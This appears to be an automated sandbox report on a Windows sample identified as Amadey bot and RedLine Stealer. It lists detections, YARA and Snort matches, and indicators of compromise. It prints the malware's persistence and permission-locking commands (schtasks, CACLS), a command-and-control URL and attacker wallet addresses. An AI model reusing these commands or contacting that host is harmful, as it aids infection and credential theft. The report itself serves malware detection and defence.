Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	800795
MD5:	b16d53f153404f5825765f11ab2b6827
SHA1:	cc5d6001624f836f5aa82e0178c6c2dc2fdac2c4
SHA256:	128da440dc3448874960fb1eb8d34c283ba78f6517e20b57f2faa158d84a3fd0
Tags:	exe
Infos:

Detection

Amadey, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Yara detected Amadey bot

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected Amadeys Clipper DLL

Disable Windows Defender real time protection (registry)

Machine Learning detection for sample

Contains functionality to inject code into remote processes

Uses schtasks.exe or at.exe to add and modify task schedules

Disable Windows Defender notifications (registry)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Uses cacls to modify the permissions of files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

file.exe (PID: 4604 cmdline: C:\Users\user\Desktop\file.exe MD5: B16D53F153404F5825765F11AB2B6827)

bKug.exe (PID: 2188 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe MD5: E2A785D0666AFD7BBE63FAF32216A8AA)

aKuf.exe (PID: 4916 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe MD5: CCFC1E2539F9382400217DF5AE6D1D8A)

nika.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

xriv.exe (PID: 3096 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 2328 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

schtasks.exe (PID: 4484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5076 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4512 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 5860 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 5856 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cmd.exe (PID: 3484 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 3236 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 3580 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

rundll32.exe (PID: 4716 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4724 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 5352 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

mnolyk.exe (PID: 4760 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 4500 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 3808 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 1104 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

cleanup

Malware Configuration

Threatname: Amadey

{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}

Threatname: Amadey

{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1718:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.822951926.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000001B.00000002.620289864.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000000.619946114.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000019.00000002.494123229.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000000.363553384.00000000008C1000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000000.493543411.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000000.748563706.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Process Memory Space: mnolyk.exe PID: 2328	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.aKuf.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.aKuf.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.2.xriv.exe.8c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
27.2.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.0.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
29.2.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.3.aKuf.exe.5b0000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.3.aKuf.exe.5b0000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.aKuf.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.aKuf.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
27.0.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.0.xriv.exe.8c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.aKuf.exe.580e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.aKuf.exe.580e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
25.0.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.file.exe.4b3b820.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
18.2.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.2.rundll32.exe.6e7c0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.3.file.exe.4b3b820.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
18.0.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
29.0.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.2.mnolyk.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 18 entries

Snort Signatures

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449780802027700 02/07/23-19:57:25.243032
SID:	2027700
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450240802027700 02/07/23-19:59:33.419821
SID:	2027700
Source Port:	50240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449814802027700 02/07/23-19:57:35.140362
SID:	2027700
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449912802027700 02/07/23-19:58:02.026161
SID:	2027700
Source Port:	49912
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449909802027700 02/07/23-19:58:01.309254
SID:	2027700
Source Port:	49909
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450237802027700 02/07/23-19:59:32.701921
SID:	2027700
Source Port:	50237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450433802027700 02/07/23-20:00:26.461663
SID:	2027700
Source Port:	50433
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450139802027700 02/07/23-19:59:06.422233
SID:	2027700
Source Port:	50139
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450209802027700 02/07/23-19:59:25.926205
SID:	2027700
Source Port:	50209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450335802027700 02/07/23-19:59:58.469497
SID:	2027700
Source Port:	50335
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450175802027700 02/07/23-19:59:15.074931
SID:	2027700
Source Port:	50175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450307802027700 02/07/23-19:59:51.711604
SID:	2027700
Source Port:	50307
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449847802027700 02/07/23-19:57:43.302254
SID:	2027700
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449749802027700 02/07/23-19:57:17.867893
SID:	2027700
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450466802027700 02/07/23-20:00:34.175411
SID:	2027700
Source Port:	50466
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450016802027700 02/07/23-19:58:31.545050
SID:	2027700
Source Port:	50016
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450114802027700 02/07/23-19:58:57.604605
SID:	2027700
Source Port:	50114
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450212802027700 02/07/23-19:59:26.656555
SID:	2027700
Source Port:	50212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450368802027700 02/07/23-20:00:08.721533
SID:	2027700
Source Port:	50368
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450273802027700 02/07/23-19:59:41.686869
SID:	2027700
Source Port:	50273
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450371802027700 02/07/23-20:00:09.426162
SID:	2027700
Source Port:	50371
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450077802027700 02/07/23-19:58:48.624595
SID:	2027700
Source Port:	50077
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450170802027700 02/07/23-19:59:13.888323
SID:	2027700
Source Port:	50170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450310802027700 02/07/23-19:59:52.435304
SID:	2027700
Source Port:	50310
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449945802027700 02/07/23-19:58:12.060541
SID:	2027700
Source Port:	49945
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450458802027700 02/07/23-20:00:32.245201
SID:	2027700
Source Port:	50458
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449839802027700 02/07/23-19:57:41.005570
SID:	2027700
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450167802027700 02/07/23-19:59:13.182938
SID:	2027700
Source Port:	50167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450072802027700 02/07/23-19:58:47.386919
SID:	2027700
Source Port:	50072
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450049802027700 02/07/23-19:58:39.386685
SID:	2027700
Source Port:	50049
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450008802027700 02/07/23-19:58:29.531823
SID:	2027700
Source Port:	50008
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450204802027700 02/07/23-19:59:22.348680
SID:	2027700
Source Port:	50204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

